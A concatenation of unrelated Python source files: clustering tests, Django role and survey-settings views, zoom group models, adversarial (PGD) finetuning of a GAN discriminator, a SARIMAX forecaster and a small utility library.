--outFileName {} -t {} -nh {} -dim_pca 100 --saveMemory".format(ROOT + 'test_matrix.scool',
3, 'kmeans', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_agglomerative_single_saveMemory():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --noPCA --saveMemory".format(ROOT + 'test_matrix.scool',
3, 'agglomerative_single', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_kmeans_euclidean_saveMemory():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --euclideanModeMinHash --saveMemory ".format(ROOT + 'test_matrix.scool',
3, 'kmeans', outfile.name, 2, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans_exact.txt", outfile.name)
def test_version():
args = "--version".split()
with pytest.raises(SystemExit) as pytest_wrapped_e:
scHicClusterMinHash.main(args)
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 0
def test_help():
args = "--help".split()
with pytest.raises(SystemExit) as pytest_wrapped_e:
scHicClusterMinHash.main(args)
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 0
|
#-*- coding: utf-8 -*-
from django.core.urlresolvers import reverse
from django.http import HttpResponse,HttpResponseRedirect
from django.shortcuts import render_to_response,RequestContext
from django.contrib.auth.decorators import login_required
from accounts.views.permission import PermissionVerify
from UserManage.forms import RoleListForm
from accounts.models import RoleList
@login_required
@PermissionVerify()
def AddRole(request):
if request.method == "POST":
form = RoleListForm(request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('listroleurl'))
else:
form = RoleListForm()
kwvars = {
'form':form,
'request':request,
}
return render_to_response('UserManage/role.add.html',kwvars,RequestContext(request))
@login_required
@PermissionVerify()
def ListRole(request):
mList = RoleList.objects.all()
#分页功能
lst = SelfPaginator(request,mList, 20)
kwvars = {
'lPage':lst,
'request':request,
}
return render_to_response('UserManage/role.list.html',kwvars,RequestContext(request))
@login_required
@PermissionVerify()
def EditRole(request,ID):
iRole = RoleList.objects.get(id=ID)
if request.method == "POST":
form = RoleListForm(request.POST,instance=iRole)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('listroleurl'))
else:
form = RoleListForm(instance=iRole)
kwvars = {
'ID':ID,
'form':form,
'request':request,
}
return render_to_response('UserManage/role.edit.html',kwvars,RequestContext(request))
@login_required
@PermissionVerify()
def DeleteRole(request,ID):
RoleList.objects.filter(id = ID).delete()
return HttpResponseRedirect(reverse('listroleurl'))
|
#!/usr/bin/env python
import sys
import argparse
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
import torchvision.transforms as tfs
from torchvision.datasets import ImageFolder, CIFAR10
from torch.utils.data import DataLoader
from miscs.pgd import attack_label_Linf_PGD
cudnn.benchmark = True
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, required=True)
parser.add_argument('--netD', type=str, required=True)
parser.add_argument('--netG', type=str, required=True)
parser.add_argument('--ndf', type=int, required=True)
parser.add_argument('--ngf', type=int, required=True)
parser.add_argument('--nclass', type=int, required=True)
parser.add_argument('--nz', type=int, default=128)
parser.add_argument('--dataset', type=str, required=True)
parser.add_argument('--batch_size', type=int, required=True)
parser.add_argument('--root', type=str, required=True)
parser.add_argument('--start_width', type=int, default=4)
parser.add_argument('--img_width', type=int, required=True)
parser.add_argument('--steps', type=int, required=True)
parser.add_argument('--epsilon', type=float, required=True)
parser.add_argument('--lam', type=float, required=True)
parser.add_argument('--lr', type=float, required=True)
parser.add_argument('--ngpu', type=int, required=True)
parser.add_argument('--workers', type=int, default=3)
parser.add_argument('--out_f', type=str, required=True)
opt = parser.parse_args()
def load_models():
if opt.model == "resnet_32":
from gen_models.resnet_32 import ResNetGenerator
from dis_models.preact_resnet import PreActResNet18
gen = ResNetGenerator(ch=opt.ngf, dim_z=opt.nz, bottom_width=opt.start_width, n_classes=opt.nclass)
dis = PreActResNet18()
elif opt.model == "resnet_64":
from gen_models.resnet_64 import ResNetGenerator
from dis_models.resnet_64 import ResNetAC
gen = ResNetGenerator(ch=opt.ngf, dim_z=opt.nz, bottom_width=opt.start_width, n_classes=opt.nclass)
dis = ResNetAC(ch=opt.ndf, n_classes=opt.nclass)
elif opt.model == "resnet_128":
from gen_models.resnet_small import ResNetGenerator
from dis_models.resnet_small import ResNetAC
gen = ResNetGenerator(ch=opt.ngf, dim_z=opt.nz, bottom_width=opt.start_width, n_classes=opt.nclass)
dis = ResNetAC(ch=opt.ndf, n_classes=opt.nclass, bn=True) #XXX here we choose bn=True, because of improper initialization
elif opt.model == "resnet_imagenet":
from gen_models.resnet import ResNetGenerator
from dis_models.resnet import ResNetAC
gen = ResNetGenerator(ch=opt.ngf, dim_z=opt.nz, bottom_width=opt.start_width, n_classes=opt.nclass)
dis = ResNetAC(ch=opt.ndf, n_classes=opt.nclass)
else:
raise ValueError(f"Unknown model name: {opt.model}")
if opt.ngpu > 0:
gen, dis = gen.cuda(), dis.cuda()
gen, dis = torch.nn.DataParallel(gen, device_ids=range(opt.ngpu)), \
torch.nn.DataParallel(dis, device_ids=range(opt.ngpu))
else:
raise ValueError("Must run on gpus, ngpu > 0")
gen.load_state_dict(torch.load(opt.netG))
dis.load_state_dict(torch.load(opt.netD))
return gen, dis
def make_dataset():
if opt.dataset == "cifar10":
trans = tfs.Compose([
tfs.RandomCrop(opt.img_width, padding=4),
tfs.RandomHorizontalFlip(),
tfs.ToTensor(),
tfs.Normalize(mean=[.5, .5, .5], std=[.5, .5, .5])
])
data = CIFAR10(root=opt.root, train=True, download=False, transform=trans)
data_test = CIFAR10(root=opt.root, train=False, download=False, transform=trans)
loader = DataLoader(data, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
loader_test = DataLoader(data_test, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
elif opt.dataset == "dog_and_cat_64":
trans = tfs.Compose([
tfs.RandomResizedCrop(opt.img_width, scale=(0.8, 0.9), ratio=(1.0, 1.0)),
tfs.RandomHorizontalFlip(),
tfs.ToTensor(),
tfs.Normalize(mean=[.5, .5, .5], std=[.5, .5, .5]),
])
data = ImageFolder(opt.root, transform=trans)
data_test = ImageFolder("/data3/sngan_dog_cat_val", transform=trans)
loader = DataLoader(data, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
loader_test = DataLoader(data_test, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
elif opt.dataset == "dog_and_cat_128":
trans = tfs.Compose([
tfs.RandomResizedCrop(opt.img_width, scale=(0.8, 0.9), ratio=(1.0, 1.0)),
tfs.RandomHorizontalFlip(),
tfs.ToTensor(),
tfs.Normalize(mean=[.5, .5, .5], std=[.5, .5, .5]),
])
data = ImageFolder(opt.root, transform=trans)
data_test = ImageFolder("/nvme0/sngan_dog_cat_val", transform=trans)
loader = DataLoader(data, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
loader_test = DataLoader(data_test, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
elif opt.dataset == "imagenet":
trans = tfs.Compose([
tfs.RandomResizedCrop(opt.img_width, scale=(0.8, 0.9), ratio=(1.0, 1.0)),
tfs.RandomHorizontalFlip(),
tfs.ToTensor(),
tfs.Normalize(mean=[.5, .5, .5], std=[.5, .5, .5]),
])
data = ImageFolder(opt.root, transform=trans)
loader = DataLoader(data, batch_size=opt.batch_size, shuffle=True, num_workers=opt.workers)
else:
raise ValueError(f"Unknown dataset: {opt.dataset}")
return loader, loader_test
def test_acc(loader_test, dis):
total = 0
correct_label = 0
for i, (x_real, y_real) in enumerate(loader_test):
if i == 100:
break
x_real, y_real = x_real.cuda(), y_real.cuda()
v_y_real, v_x_real = Variable(y_real), Variable(x_real)
adv_input = attack_label_Linf_PGD(v_x_real, v_y_real, dis, opt.steps * 4, opt.epsilon)
with torch.no_grad():
_, d_multi = dis(adv_input)
_, idx = torch.max(d_multi.data, dim=1)
label_correct = idx.eq(y_real)
correct_label += torch.sum(label_correct).item()
total += y_real.numel()
print(f'test_acc: {correct_label/total}')
def get_optimizer(parameters):
#optimizer = torch.optim.SGD(dis.parameters(), lr=opt.lr, momentum=0.9, weight_decay=5.0e-4)
return torch.optim.Adam(parameters, lr=opt.lr)
def main():
# model
gen, dis = load_models()
# data
loader, loader_test = make_dataset()
# optimizer
optimizer = get_optimizer(dis.parameters())
# loss function
loss_f = nn.CrossEntropyLoss()
# buffer
noise = torch.FloatTensor(opt.batch_size, opt.nz).zero_().cuda()
noise_v = Variable(noise)
noise_y = torch.LongTensor(opt.batch_size).zero_().cuda()
noise_y_v = Variable(noise_y)
epochs = [20, 20, 10, 10]
accumulate = 0
for stage in epochs:
for _ in range(stage):
accumulate += 1
for it, (x, y) in enumerate(loader):
# feed real images
x, y = x.cuda(), y.cuda()
vx_real, vy = Variable(x), Variable(y)
vx_real_adv = attack_label_Linf_PGD(vx_real, vy, dis,
opt.steps, opt.epsilon)
_, output_real = dis(vx_real_adv)
loss_real = loss_f(output_real, vy)
# feed fake images
if opt.lam > 0:
noise_v.normal_(0, 1)
noise_y.random_(0, to=opt.nclass)
with torch.no_grad():
vx_fake = gen(noise_v, noise_y_v)
vx_fake_adv = attack_label_Linf_PGD(vx_fake, noise_y_v,
dis, opt.steps, opt.epsilon)
_, output_fake = dis(vx_fake_adv)
loss_fake = loss_f(output_fake, noise_y_v)
# combined loss
loss_total = loss_real + opt.lam * loss_fake
else:
loss_total = loss_real
dis.zero_grad()
loss_total.backward()
optimizer.step()
# accuracy on real / fake
_, idx = torch.max(output_real, dim=1)
correct_real = torch.sum(y.eq(idx.data)).item()
accuracy_real = correct_real / y.numel()
if opt.lam > 0:
_, idx = torch.max(output_fake, dim=1)
correct_fake = torch.sum(noise_y.eq(idx.data)).item()
accuracy_fake = correct_fake / noise_y.numel()
print(f'[{accumulate}][{it}/{len(loader)}] acc_real: {accuracy_real}, acc_fake: {accuracy_fake}')
else:
print(f'[{accumulate}][{it}/{len(loader)}] acc_real: {accuracy_real}, acc_fake: NA')
sys.stdout.flush()
# test
test_acc(loader_test, dis)
# save model
torch.save(dis.state_dict(), f'./{opt.out_f}/dis_finetune_{accumulate}.pth')
opt.lr /= 10
#optimizer = torch.optim.SGD(dis.parameters(), lr=opt.lr, momentum=0.9, weight_decay=5.0e-4)
optimizer = get_optimizer(dis.parameters())
if __name__ == "__main__":
main()
|
"""
zoom.models
common models
"""
import logging
import zoom
from zoom.helpers import link_to, url_for_item, url_for
from zoom.utils import Record
from zoom.records import RecordStore
from zoom.users import Users
from zoom.audit import audit
class Model(zoom.utils.DefaultRecord):
"""Model Superclass
Provide basic model properties and functions.
Subclass this to create a Model that can be stored in
a RecordStore, EntityStore or some other type of store.
Assumes every record has an id attribute. If not, you
will need to provide one via an additional property
defined in the subclass.
The key can end up being just the str of the id, however
it is provided separately to make it easy to provide human
friendly keys typically used in REST style URLs. If used
this way the key should generated such that it is unique
for each record.
>>> from zoom.utils import Bunch
>>> zoom.system.site = site = zoom.sites.Site()
>>> zoom.system.user = zoom.system.site.users.get(1)
>>> zoom.system.request = Bunch(route=[], app=Bunch(name=__name__))
>>> class MyModel(Model):
... pass
>>> thing = MyModel(name='Pat Smith')
>>> thing.name
'Pat Smith'
>>> thing.key
'pat-smith'
>>> url_for_item('pat-smith')
'/pat-smith'
>>> thing.url
'/pat-smith'
>>> thing.link
'<a href="/pat-smith" name="link-to-pat-smith">Pat Smith</a>'
>>> thing.allows('user', 'edit')
False
"""
@property
def key(self):
"""Return the key"""
return zoom.utils.id_for(self.name)
@property
def url(self):
"""Return a valid URL"""
return url_for_item(self.key)
@property
def link(self):
"""Return a link"""
return link_to(self.name, self.url)
def allows(self, user, action):
return False
def get_users(db, group):
"""Get users of a Group
Gets the users that are members of a group from a given database.
>>> site = zoom.sites.Site()
>>> users_group = Groups(site.db).first(name='users')
>>> get_users(site.db, users_group)
{2}
"""
my_users = {
user_id
for user_id, in db("""
select distinct
users.id
from users, members
where
users.id = members.user_id
and group_id = %s
""",
group.group_id)
}
return my_users
class Member(Record):
pass
class Members(RecordStore):
def __init__(self, db, entity=Member):
RecordStore.__init__(
self,
db,
entity,
name='members',
key='id'
)
class Subgroup(Record):
pass
class Subgroups(RecordStore):
def __init__(self, db, entity=Subgroup):
RecordStore.__init__(
self,
db,
entity,
name='subgroups',
key='id'
)
class Group(Record):
"""Zoom Users Group
>>> zoom.system.site = site = zoom.sites.Site()
>>> groups = Groups(site.db)
>>> group = groups.first(name='users')
>>> user = site.users.first(username='admin')
>>> group.allows(user, 'edit')
True
>>> group.key
'2'
>>> group.url
'/admin/groups/2'
>>> group.link
'<a href="/admin/groups/2" name="link-to-users">users</a>'
>>> group.roles
{4}
>>> zoom.utils.pp(group.apps)
{
10,
12,
20,
28,
29
}
>>> groups.first(name='everyone').subgroups
{2, 3}
>>> groups.first(name='users').user_ids
[2]
>>> {u.username for u in site.users.get(groups.first(name='users').user_ids)}
{'user'}
"""
@property
def group_id(self):
"""Return the group ID"""
return self._id
@property
def key(self):
"""Return the group key"""
return str(self._id)
@property
def url(self):
"""return the group URL"""
return url_for('/admin/groups/{}'.format(self.key))
@property
def link(self):
"""user as link"""
return link_to(self.name, self.url)
def allows(self, user, action):
"""access policy"""
system_groups = ['administrators', 'everyone', 'guests', 'managers', 'users']
return self.name not in system_groups or action != 'delete'
def get_users(self):
"""return set of IDs for users that are a member of this group"""
return get_users(self['__store'].db, self)
@property
def is_group_admin_group(self):
"""Return True if this is a group amdin group
Returns bool indicating whether or not members of this group
are able to administer group memberships of any groups on
the system.
"""
groups = self['__store']
return self.group_id in groups.get_group_admin_group_ids()
@property
def users(self):
"""Return list of IDs of users that are part of this group"""
# TODO:
# Ideally, this should have returned users as it advertises. Instead
# it returns user IDs. We're introducing the user_ids property below
# to take the place of this property prior to switching this it
# over to fixing it so clients from this point forward have a property
# that returns value consistent with its name. Plan to do a scan of
# existing systems before switching this over so we don't break things.
return self.get_users()
@property
def user_ids(self):
"""Return list of user IDs of users that are in the group"""
return list(self.get_users())
def add_user(self, user):
"""Add a user to a group"""
store = self.get('__store')
members = Members(store.db)
membership = members.first(group_id=self._id, user_id=user._id)
if not membership:
members.put(Member(group_id=self._id, user_id=user._id))
@property
def roles(self):
"""Return set of IDs of roles that group can assume"""
db = self['__store'].db
my_roles = {
group_id
for group_id, in db("""
select distinct
groups.id
from `groups`, subgroups
where
groups.id = subgroups.group_id
and subgroup_id = %s
and groups.type = 'U'
""",
self._id)
}
return my_roles
@property
def apps(self):
"""Return set of IDs of apps that group can access"""
db = self['__store'].db
my_apps = {
group_id
for group_id, in db("""
select distinct
group_id
from subgroups, groups
where
groups.id = subgroups.group_id
and subgroup_id = %s
and groups.type = 'A'
""",
self._id)
}
return my_apps
def get_app_ids(self):
"""Return set of app group ids"""
return self.apps
def get_app_names(self):
"""Return set of names of app groups"""
groups = self['__store']
lookup = {
g.group_id: g.name[2:]
for g in groups
if (g.name.startswith('a_'))
}
return set(map(lookup.get, self.get_app_ids()))
@property
def app_names(self):
"""Return set of names of app groups"""
return self.get_app_names()
@property
def subgroups(self):
"""Return set of IDs of subgroups that are part of this group"""
db = self['__store'].db
my_subgroups = {
group_id
for group_id, in db("""
select distinct
subgroup_id
from subgroups, groups
where
id = group_id
and group_id = %s
and groups.type = 'U'
""",
self._id)
}
return my_subgroups
@property
def administrators(self):
"""Returns the administrator group name"""
store = self['__store']
admin_group = store.get(self.get('admin_group_id', None))
if admin_group:
return admin_group.name
return 'nothing'
def add_subgroup(self, subgroup):
"""add a subgroup"""
db = self['__store'].db
cmd = """
insert into subgroups (
group_id,
subgroup_id
) values (
%s, %s
)
"""
db(cmd, self.group_id, subgroup.group_id)
audit(
'add subgroup',
self.name,
subgroup.name,
)
def remove_subgroup(self, subgroup):
"""remove a subgroup"""
db = self['__store'].db
cmd = """
delete from subgroups where
group_id=%s and
subgroup_id=%s
"""
db(cmd, self.group_id, subgroup.group_id)
audit(
'remove subgroup',
self.name,
subgroup.name,
)
def update_subgroups_by_id(self, subgroup_ids):
"""Post updated group subgroups"""
groups = self['__store']
updated_subgroups = set(map(int, subgroup_ids))
logger = logging.getLogger(__name__)
debug = logger.debug
debug('updating subgroups: %r', updated_subgroups)
existing_subgroups = self.subgroups
debug('existing subgroups: %r', existing_subgroups)
if updated_subgroups != existing_subgroups:
group_lookup = {
group.group_id: group.name
for group in groups
}
db = groups.db
to_remove = existing_subgroups - updated_subgroups
if to_remove:
debug('removing subgroups %r from %r', to_remove, self.name)
cmd = 'delete from subgroups where group_id=%s and subgroup_id in %s'
db(cmd, self.group_id, to_remove)
for subgroup_id in to_remove:
audit(
'remove subgroup',
self.name,
group_lookup.get(
subgroup_id,
'unknown (%s)' % subgroup_id,
)
)
to_add = updated_subgroups - existing_subgroups
if to_add:
debug('adding %r to %r', to_add, self.name)
cmd = 'insert into subgroups (group_id, subgroup_id) values (%s, %s)'
sequence = zip([self.group_id] * len(to_add), to_add)
db.execute_many(cmd, sequence)
for subgroup_id in to_add:
audit(
'add subgroup',
self.name,
group_lookup.get(
subgroup_id,
'unknown (%s)' % subgroup_id,
)
)
else:
debug('subgroups unchanged')
def update_supergroups_by_id(self, group_ids, kind):
"""Post updated group supergroups"""
updated = set(map(int, group_ids))
logger = logging.getLogger(__name__)
debug = logger.debug
debug('updating %s: %r', kind, updated)
groups = self['__store']
# print(kind)
existing = getattr(self, kind + 's')
debug('existing %s: %r', kind, updated)
# print(updated, existing)
if updated != existing:
group_lookup = {
group.group_id: group.name
for group in groups
}
db = groups.db
to_remove = existing - updated
if to_remove:
debug('removing %s %r from %r', kind, to_remove, self.name)
cmd = 'delete from subgroups where subgroup_id=%s and group_id in %s'
db(cmd, self.group_id, to_remove)
for group_id in to_remove:
audit(
'remove %s' % kind,
group_lookup.get(
group_id,
'unknown (%s)' % group_id,
),
self.name
)
to_add = updated - existing
if to_add:
debug('adding %s %r to %r', kind, to_add, self.name)
cmd = 'insert into subgroups (group_id, subgroup_id) values (%s, %s)'
sequence = zip(to_add, [self.group_id] * len(to_add))
db.execute_many(cmd, sequence)
for subgroup_id in to_add:
audit(
'add %s' % kind,
group_lookup.get(
subgroup_id,
'unknown (%s)' % subgroup_id,
),
self.name
)
else:
debug('%s unchanged', kind)
def update_apps_by_id(self, app_ids):
"""Update apps by app group ids"""
return self.update_supergroups_by_id(app_ids, 'app')
def update_roles_by_id(self, role_ids):
"""Update roles by role group ids"""
return self.update_supergroups_by_id(role_ids, 'role')
def update_members_by_id(self, user_ids):
"""Post updated group memberships"""
updated = set(int(id) for id in user_ids)
logger = logging.getLogger(__name__)
debug = logger.debug
db = self['__store'].db
users = zoom.users.Users(db)
debug('updating members: %r', updated)
cmd = 'select user_id from members where group_id=%s'
existing = set(
user_id for user_id, in
db(cmd, self.group_id)
)
debug('existing members: %r', existing)
if updated != existing:
user_lookup = {
user.user_id: user.username
for user in users
}
to_remove = existing - updated
if to_remove:
debug('removing members: %r', to_remove)
cmd = 'delete from members where group_id=%s and user_id in %s'
db(cmd, self.group_id, to_remove)
for user_id in to_remove:
audit('remove member', self.name, \
user_lookup.get(user_id, 'unknown'))
to_add = updated - existing
if to_add:
debug('adding members: %r', to_add)
cmd = 'insert into members (group_id, user_id) values (%s, %s)'
sequence = zip([self.group_id] * len(to_add), to_add)
db.execute_many(cmd, sequence)
for user_id in to_add:
audit('add member', self.name, \
user_lookup.get(user_id, 'unknown'))
else:
debug('memberships unchanged')
def add_apps(self, app_names):
"""Add apps to the group"""
logger = logging.getLogger(__name__)
debug = logger.debug
groups = self['__store']
for name in app_names:
debug('adding %s', name)
groups.add_app(name)
supergroup = groups.first(name='a_' + name)
if supergroup:
debug('adding supergroup %s to %s', name, self.name)
supergroup.add_subgroup(self)
def remove_apps(self, app_names):
"""Remove apps from the group"""
groups = self['__store']
for name in app_names:
supergroup = groups.first(name='a_' + name)
if supergroup:
supergroup.remove_subgroup(self)
class Groups(RecordStore):
def __init__(self, db, entity=Group):
RecordStore.__init__(
self,
db,
entity,
name='groups',
key='id'
)
def locate(self, locator):
"""locate a group whether it is referred to by reference, id or name"""
return (
isinstance(locator, Group) and locator or
isinstance(locator, int) and self.get(locator) or
isinstance(locator, str) and self.first(name=locator)
)
def add(self, name, group_type='U', description=''):
"""Add a group"""
group_id = self.put(
Group(
name=name,
type=group_type,
description=description,
admin_group_id=1,
)
)
return group_id
def after_insert(self, record):
name = record['name']
group_id = record['_id']
debug = logging.getLogger(__name__).debug
debug('created new group %r (%r)', name, group_id)
audit('create group', name)
def after_update(self, record):
name = record['name']
group_id = record['_id']
debug = logging.getLogger(__name__).debug
debug('updated group %r (%r)', name, group_id)
audit('update group', name)
def after_delete(self, record):
"""After Delete
Adds log entries after a delete has been executed.
"""
debug = logging.getLogger(__name__).debug
debug('deleted group %r (%r)', record['name'], record['group_id'])
audit('delete group', record['name'])
def add_app(self, name):
"""Add an app"""
debug = logging.getLogger(__name__).debug
group_name = 'a_' + name
if not self.first(name=group_name):
group_id = self.put(
Group(
name=group_name,
type='A',
description='%s application group' % name,
admin_group_id=1,
)
)
debug('created new app group %r (%r)', group_name, group_id)
audit('create app group', group_name)
return group_id
def remove_app(self, name):
"""Remove an app"""
debug = logging.getLogger(__name__).debug
group_name = 'a_' + name
if self.first(name=group_name):
self.delete(name=group_name)
audit('delete app group', name)
debug('deleted app group %r', group_name)
def get_group_admin_group_ids(self):
"""Return a set of group administrator group group_ids"""
return set(
group.admin_group_id for group in self.find(type='U')
)
def __str__(self):
return str(
zoom.utils.ItemList(
((
group.group_id,
group.name,
group.type,
group.description,
) for group in self),
labels=('ID', 'Name', 'Type', 'Description')
)
)
class SystemAttachment(Record):
pass
Attachment = SystemAttachment
def handler(request, handler, *rest):
request.site.groups = Groups(request.site.db)
request.site.users = Users(request.site.db)
return handler(request, *rest)
|
import json
import copy
import pyminizip
import uuid
from collections import OrderedDict
import yaml
from django.conf import settings
from django.core.files.storage import default_storage
from django.http import HttpResponse
from django.views import generic
import logging
from django.utils.translation import gettext
from AIST_survey.models.enquete import Enquete
from AIST_survey.models.question import Question
from make_enquete_setting.forms import ImportSettingForm
class IndexView(generic.FormView):
template_name = "make_enquete_setting/index.html"
form_class = ImportSettingForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
# 回答種別の説明文を要求された言語に変換
type_dict = copy.deepcopy(Question.type_dict)
for key, value in type_dict.items():
value['description'] = gettext(value['description'])
context['question_type'] = json.dumps(type_dict)
context['password_min_length'] = Enquete.PASSWORD_MIN_LENGTH
context['password_max_length'] = Enquete.PASSWORD_MAX_LENGTH
context['title_max_length'] = Enquete._meta.get_field("title").max_length
# フロントエンド側にDEBUGであるかどうかの値を送信
context['is_debug'] = settings.DEBUG
return context
def post(self, request, *args, **kwargs):
# YAMLのインポート時にOrderedDictで読み込むための設定
def construct_odict(loader, node):
return OrderedDict(loader.construct_pairs(node))
logger = logging.getLogger('development')
context = self.get_context_data(**kwargs)
# 設定ファイルがインポートされた場合はYAMLファイルをパースして渡す
form = ImportSettingForm(request.POST, request.FILES)
upload_file = request.FILES['file']
if form.is_valid():
file_name = default_storage.save(str(uuid.uuid4()) + ".yaml", upload_file)
with default_storage.open(file_name) as rf:
yaml.add_constructor('tag:yaml.org,2002:map', construct_odict)
setting_data = yaml.safe_load(rf)
context["setting_data"] = json.dumps(setting_data)
logger.debug("import_setting : " + str(setting_data))
default_storage.delete(file_name)
else:
context["form_data"] = form
context["import_error"] = 'インポートしようとしたファイルの形式が不正です。'
return self.render_to_response(context)
class ExportSettingView(generic.View):
@staticmethod
def post(request):
# yamlをdumpする際にOrderedDictの出力形式を指定する関数
def represent_odict(dumper, instance):
return dumper.represent_mapping('tag:yaml.org,2002:map', instance.items())
# アンケートの設定の入力を取得
logger = logging.getLogger('development')
hashed_enquete_password = Enquete.hash_password(request.POST["enquete_password"])
dic = OrderedDict(enquete_title=request.POST["enquete_title"],
enquete_has_password=request.POST["enquete_has_password"],
enquete_password=hashed_enquete_password,
enquete_published_at=request.POST["enquete_published_at"],
enquete_expired_at=request.POST["enquete_expired_at"],
# enquete_finished_at=request.POST["enquete_finished_at"],
enquete_term_of_service=request.POST["term_of_service"],
question_list=[])
# 質問のリストを取得
question_text_list = request.POST.getlist("question_text")
question_type_list = request.POST.getlist("question_type")
question_is_skip_allowed_list = request.POST.getlist("question_is_skip_allowed")
question_min_like_required_list = request.POST.getlist("question_min_like_required")
question_example_answer_list = request.POST.getlist("question_example_answer")
question_with_answered_num = request.POST.getlist("question_with_answered_num")
question_without_select = request.POST.getlist("question_without_select")
question_is_result_public = request.POST.getlist("question_is_result_public")
for index, question_text in enumerate(question_text_list):
tmp_dic = OrderedDict(question_text=question_text,
question_type=question_type_list[index],
question_is_skip_allowed=question_is_skip_allowed_list[index],
question_min_like_required=question_min_like_required_list[index],
question_example_answer=question_example_answer_list[index],
question_with_answered_num=question_with_answered_num[index],
question_without_select=question_without_select[index],
question_is_result_public=question_is_result_public[index],
choice_list=request.POST.getlist("choice_text_" + str(index)))
dic['question_list'].append(tmp_dic)
logger.debug("export_setting_data : " + str(dic))
# OrderedDictをdumpする際の出力形式を指定
# 参考URL:https://qiita.com/podhmo/items/aa954ee1dc1747252436#jsonと互換性をもたせた表現で出力するようにするdictの数値のkeyを文字列にする
yaml.add_representer(OrderedDict, represent_odict)
setting_yaml = yaml.dump(dic, default_flow_style=False, allow_unicode=True, encoding="utf-8").decode('utf-8')
yaml_path = 'export_setting/' + 'enquete_setting_' + str(uuid.uuid4().hex) + '.yaml'
# YAML設定ファイルを一時ファイルとして保存
with default_storage.open(yaml_path, 'w') as f:
f.write(setting_yaml)
# YAMLファイルを圧縮したzipファイルを一時ファイルとして保存
zip_path = 'export_setting/' + str(uuid.uuid4()) + '.zip'
pyminizip.compress(default_storage.path(yaml_path), '/', default_storage.path(zip_path),
request.POST["zip_password"], 0)
# zipファイルからbytesオブジェクトを生成
string_io = default_storage.open(zip_path, 'rb')
# 一時ファイル群を削除
default_storage.delete(yaml_path)
default_storage.delete(zip_path)
response = HttpResponse(string_io, content_type='application/zip')
response['Content-Disposition'] = 'attachment; filename="enquete_setting.zip"'
return response
|
from django.contrib import admin
from .models import Producto
from clases_abstracta.admin import AbstractaAdmin
from import_export import resources
class ProductoResource(resources.ModelResource):
class Meta:
model = Producto
class ProductoAdmin(AbstractaAdmin):
search_fields = ('nombre', 'marca', 'id_categoria')
list_display = ('nombre', 'marca', 'id_categoria', 'estado', 'stock', 'fecha_actualizacion')
list_editable = ('stock',)
resource_class = ProductoResource
def save_model(self, request, obj, form, change) -> None:
if obj.stock == 0:
obj.estado = False
obj.save()
else:
obj.estado = True
obj.save()
return super().save_model(request, obj, form, change)
admin.site.register(Producto, ProductoAdmin)
|
import statsmodels.api as sm
import numpy
class SARIMAX(object):
def __init__(self, order=(0,0,2), season=(1,1,2,24), look_back=72):
self.__order = order
self.__season = season
self.__look_back = look_back
def __create_sarimax_dataset(self, dataset):
x = []
for i in range(len(dataset)-self.__look_back-1):
x.append(dataset[i:i+self.__look_back])
return x
def predict(self, data):
data = self.__create_sarimax_dataset(data)
result = []
for d in data:
model = sm.tsa.statespace.SARIMAX(
d,
order = self.__order,
seasonal_order = self.__season,
enforce_stationarity = False,
enforce_invertibility = False
)
fit = model.fit(disp=0)
result.append(fit.forecast()[0])
return result
|
from __future__ import print_function
from __future__ import absolute_import, division
import random, re, datetime, time,pprint,sys,math
from contextlib import contextmanager
from base import *
@setting #########################################
def LIB(): return o(
seed = 1,
has = o(decs = 3,
skip="_",
wicked=True),
show = o(indent=2,
width=50)
) ################################################
"""
Unit test engine, inspired by Kent Beck.
"""
def ok(*lst):
for one in lst: unittest(one)
return one
class unittest:
tries = fails = 0 # tracks the record so far
@staticmethod
def score():
t = unittest.tries
f = unittest.fails
return "# TRIES= %s FAIL= %s %%PASS = %s%%" % (
t,f,int(round(t*100/(t+f+0.001))))
def __init__(i,test):
unittest.tries += 1
try:
test()
except Exception,e:
unittest.fails += 1
i.report(e,test)
def report(i,e,test):
print(traceback.format_exc())
print(unittest.score(),':',test.__name__, e)
#-------------------------------------------------
now = datetime.datetime.now
r = random.random
any = random.choice
isa = isinstance
sqrt = math.sqrt
log = math.log
e = math.e
pi= math.pi
sin = math.sin
fun = lambda x: x.__class__.__name__ == 'function'
milli_time = lambda: int(round(time.time() * 1000))
def rseed(seed):
if seed is not None: random.seed(seed)
def lt(x,y): return x < y
def gt(x,y): return x > y
def first(lst): return lst[0]
def last(lst): return lst[-1]
def mean(lst): return sum(lst)/len(lst)
def within(lo,hi): return lo + (hi - lo)*r()
def wrap(x,lo,hi):
return x if x==hi else lo + (x - lo) % (hi - lo)
def shuffle(lst):
random.shuffle(lst)
return lst
def ntiles(lst, tiles=[0.1,0.3,0.5,0.7,0.9],
norm=False, f=3,ordered=True):
def pos(x):
return len(lst) - 1 if x == 1 else int(len(lst)*x)
assert len(lst) > len(tiles),"list too small"
if not ordered:
lst = sorted(lst)
if norm:
lo,hi = lst[0], lst[-1]
lst= [(x - lo)/(hi-lo+0.0001) for x in lst]
at = lambda x: lst[ pos(x) ]
return g([ at(tile) for tile in tiles ],f)
def say(*lst):
sys.stdout.write(', '.join(map(str,lst)))
sys.stdout.flush()
